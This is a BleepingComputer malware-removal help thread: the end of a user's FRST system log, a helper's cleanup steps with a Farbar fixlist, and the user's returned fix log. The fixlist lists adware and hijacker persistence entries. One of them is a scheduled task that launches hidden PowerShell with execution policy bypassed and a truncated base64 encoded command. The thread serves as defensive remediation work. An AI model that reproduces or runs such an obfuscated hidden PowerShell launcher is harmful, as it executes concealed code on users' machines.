Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/21/2018 10:57:33 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/21/2018 10:12:29 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/21/2018 09:11:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/21/2018 12:22:51 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: There are currently no active network connections. Background Intelligent Transfer Service (BITS) will try again when an adapter is connected.

Error: (03/21/2018 12:12:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/19/2018 03:53:14 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: There are currently no active network connections. Background Intelligent Transfer Service (BITS) will try again when an adapter is connected.

Error: (03/19/2018 03:47:25 PM) (Source: Microsoft Office 14) (EventID: 2001) (User: )
Description: Event-ID 2001


System errors:
=============
Error: (03/21/2018 11:03:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 110.39.0.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=260974&clcid=0x409&NRI=true&arch=x64&eng=2.1.10302.0&sig=110.39.0.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: Network Inspection System

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 2.1.10302.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved

Error: (03/21/2018 11:03:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.173.618.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.10502.0&avdelta=1.173.618.0&asdelta=1.173.618.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: AntiSpyware

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 1.1.10502.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved

Error: (03/21/2018 11:03:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.173.618.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.10502.0&avdelta=1.173.618.0&asdelta=1.173.618.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 1.1.10502.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved

Error: (03/21/2018 11:03:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.173.618.0

    Update Source: Microsoft Update Server

    Update Stage: Search

    Source Path: http://www.microsoft.com

    Signature Type: AntiVirus

    Update Type: Full

    User: NT AUTHORITY\SYSTEM

    Current Engine Version:

    Previous Engine Version: 1.1.10502.0

    Error code: 0x8024402c

    Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (03/21/2018 11:03:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PDF Document Manager service failed to start due to the following error:
The system cannot find the file specified.

Error: (03/21/2018 11:01:51 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} did not register with DCOM within the required timeout.

Error: (03/21/2018 10:57:56 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 110.39.0.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=260974&clcid=0x409&NRI=true&arch=x64&eng=2.1.10302.0&sig=110.39.0.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: Network Inspection System

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 2.1.10302.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved

Error: (03/21/2018 10:57:56 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.173.618.0

    Update Source: Microsoft Malware Protection Center

    Update Stage: Search

    Source Path: http://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.10502.0&avdelta=1.173.618.0&asdelta=1.173.618.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094

    Signature Type: AntiSpyware

    Update Type: Full

    User: NT AUTHORITY\NETWORK SERVICE

    Current Engine Version:

    Previous Engine Version: 1.1.10502.0

    Error code: 0x80072ee7

    Error description: The server name or address could not be resolved


==================== Memory info ===========================

Processor: AMD E-300 APU with Radeon™ HD Graphics
Percentage of memory in use: 56%
Total physical RAM: 1641.41 MB
Available physical RAM: 711.23 MB
Total Virtual: 3282.81 MB
Available Virtual: 1780.61 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:277.69 GB) (Free:234.43 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (HP_RECOVERY) (Fixed) (Total:15.11 GB) (Free:2.26 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (HP_TOOLS) (Fixed) (Total:4.98 GB) (Free:2.12 GB) FAT32

\\?\Volume{1c912cc4-7fc3-11e1-ab2d-806e6f6e6963}\ (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.25 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 9CED46CF)
Partition 1: (Active) - (Size=300 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=277.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.1 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=5 GB) - (Type=0C)

==================== End of Addition.txt ============================



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:06:56 AM

Posted 23 March 2018 - 09:04 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Remove these programs in bold via the Control Panel > Programs > ...

DMUninstaller (HKLM-x32\...\DMUninstaller) (Version: - ) <==== ATTENTION
llEsss2pay (HKLM-x32\...\{82B558C7-2A69-D3D5-B65A-DCAB3B65AD02}) (Version: - less2pay) <==== ATTENTION
Plus-HD-1.2 (HKLM-x32\...\Plus-HD-1.2) (Version: 1.32.153.0 - Plus HD) <==== ATTENTION
Software Version Updater (HKLM-x32\...\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}) (Version: 112.47.14.333 - ) <==== ATTENTION
---

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [mobilegeni daemon] => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe*******************************************************************************
HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Run: [NextLive] => C:\windows\SysWOW64\rundll32.exe "C:\Users\Tech 14\AppData\Roaming\newnext.me\nengine.dll",EntryPoint -m l
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.conduit.com/?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&SSPV=
SearchScopes: HKLM -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\.DEFAULT -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
BHO: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho64.dll [2013-12-22] (Plus HD)
BHO: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.x64.dll [2014-04-22] ()
BHO-x32: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho.dll [2013-12-22] (Plus HD)
BHO-x32: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.dll [2014-04-22] ()
Toolbar: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
S2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService [X] <==== ATTENTION

Task: {377FBCA9-E775-4F65-9277-ED0882D40ED0} - System32\Tasks\Plus-HD-1.2-updater => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe [2013-12-22] (Plus HD)
Task: {63F10999-1085-44F5-92F4-00E3050A14A6} - System32\Tasks\Plus-HD-1.2-chromeinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe [2013-12-22] (Plus HD)
Task: {6A0BBF0A-DE94-41FE-9157-FF8D9970AB11} - System32\Tasks\Plus-HD-1.2-firefoxinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe [2013-12-22] (Plus HD)
Task: {AA72BE28-D781-4FCA-A97F-27CAA5C4187D} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE} - System32\Tasks\Plus-HD-1.2-codedownloader => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe [2013-12-22] (Plus HD)
Task: {E7F157B8-18FC-44F8-9362-7CF6F27B0696} - System32\Tasks\Plus-HD-1.2-enabler => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe [2013-12-22] (Plus HD)
Task: {FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE} - System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwA7ADsAOwAgACAAOwA7ACAAIAAgADsAOwAgACAAOwAgADsAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (the data entry h... (long line)
Task: {FA9233DD-423A-457F-BD31-003D43E5F021} - System32\Tasks\AmiUpdXp => C:\Users\Tech 14\AppData\Local\29033\Updater.exe [2016-07-17] (Emirates) <==== ATTENTION
Task: C:\windows\Tasks\AmiUpdXp.job => C:\Users\Tech 14\AppData\Local\29033\Updater.exe <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe/installcrx /crxinstalltype=0 /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.crx' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdoma... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-codedownloader.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe|/reinstallapp /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /coded... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-enabler.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe?/enablebho /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe?/installxpi /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.xpi' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.... (long line)
Task: C:\windows\Tasks\Plus-HD-1.2-updater.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe?/runupdater /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hx... (long line)
AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [126]

C:\Windows\System32\Tasks\Plus-HD-1.2-updater
C:\Program Files (x86)\Plus-HD-1.2
C:\Windows\System32\Tasks\Plus-HD-1.2-chromeinstaller
C:\Windows\System32\Tasks\Plus-HD-1.2-firefoxinstaller
C:\Windows\System32\Tasks\LaunchSignup
C:\Program Files (x86)\MyPC Backup
C:\Windows\System32\Tasks\Plus-HD-1.2-codedownloader
C:\Windows\System32\Tasks\Plus-HD-1.2-enabler
C|Windows\System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC}
C:\windows\system32\WindowsPowershell\v1.0\powershell.exe
C\Windows\System32\Tasks\AmiUpdXp
C:\Users\Tech 14\AppData\Local\29033
C:\Windows\\Tasks\AmiUpdXp.job
C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job
C:\windows\Tasks\Plus-HD-1.2-codedownloader.job
C:\windows\Tasks\Plus-HD-1.2-enabler.job
C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job
C:\windows\Tasks\Plus-HD-1.2-updater.job

C:\Program Files (x86)\Mobogenie
C:\Users\Tech 14\AppData\Roaming\newnext.me
C:\ProgramData\llEsss2pay
C:\ProgramData\llEsss2pay

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
---

Reset Chrome...
Open Google Chrome, click on menu icon google-chrome-setting-icon.png or the 3 vertical dots located right side top of the google chrome.
 
Click "Settings" then "Show advanced settings" at the bottom of the screen.
 
Click "Reset browser settings" button.
 
Restart Chrome.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the LogFile button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleanerCx.txt (x is a number).
===

Download to your Desktop the Junkware Removal Tool Download from this link.
http://www.bleepingcomputer.com/download/junkware-removal-tool/

Shutdown your antivirus to avoid any conflicts.
Right click the icon - disable for say 20 mins.
Right-mouse click JRT.exe and select Run as administrator (If using XP just double click on the icon to run it.)
The tool will open and start scanning your system.
Please be patient as this can take a while to complete.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.
======

Your version of Java is outdated and needs to be updated to take advantage of fixes that have eliminated security vulnerabilities.

You can manually check your present version and update as recommended. (You need to check with Internet Explorer) <- Important.
https://www.java.com/en/download/installed.jsp

Be careful not to install malware posing as Java update!
Important read this blog.
http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/

Quoted from the page.
"In light of the recent events surrounding Java, users must seriously consider their use of Java. Do they really need it? If yes, make sure that users follow the steps we recommended and get the security update directly from the official oracle website." at:
http://www.oracle.com/technetwork/java/javase/downloads/index.html

How to disable Java in your browsers
http://www.infoworld.com/t/web-browsers/how-disable-java-in-your-browsers-210882

If still present after these updates remove these old version(s) via the Control Panel > Programs > Programs and Features.
Java 7 Update 4 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217004FF}) (Version: 7.0.40 - Oracle)
JavaFX 2.1.0 (HKLM-x32\...\{1111706F-666A-4037-7777-210328764D10}) (Version: 2.1.0 - Oracle Corporation)
===

Please post the fixlot.txt, the AdwCleanerCx.txt and the JRT.txt logs for my review.

Let me know what problem persists with this computer.

p.s.
Do you reconnize this IP address.
199.203.131.151
Check if out : https://who.is/whois-ip/ip-address/199.203.131.151
====

#3 starblazers

starblazers
  • Topic Starter

  • Members
  • 56 posts
  • OFFLINE
  •  
  • Local time:06:56 AM

Posted 25 March 2018 - 11:07 AM

Hello nasdaq, thank you for assisting me!

I did all of the things you asked, although I could not uninstall

llEsss2pay (HKLM-x32\...\{82B558C7-2A69-D3D5-B65A-DCAB3B65AD02}) (Version: - less2pay)

When I attempted to do so, a popup told me that I "do not have sufficient access to uninstall" it and to contact my system administrator.

Everything else, however, I have done. I am posting the fixlog.txt, the AdwCleanerCx.txt and the JRT.txt logs as requested.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Tech 14 (23-03-2018 21:53:40) Run:1
Running from C:\Users\Tech 14\Desktop
Loaded Profiles: Tech 14 (Available Profiles: Tech 14)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [mobilegeni daemon] => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe*******************************************************************************
HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Run: [NextLive] => C:\windows\SysWOW64\rundll32.exe "C:\Users\Tech 14\AppData\Roaming\newnext.me\nengine.dll",EntryPoint -m l
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.conduit.com/?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&SSPV=
SearchScopes: HKLM -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\.DEFAULT -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
BHO: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho64.dll [2013-12-22] (Plus HD)
BHO: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.x64.dll [2014-04-22] ()
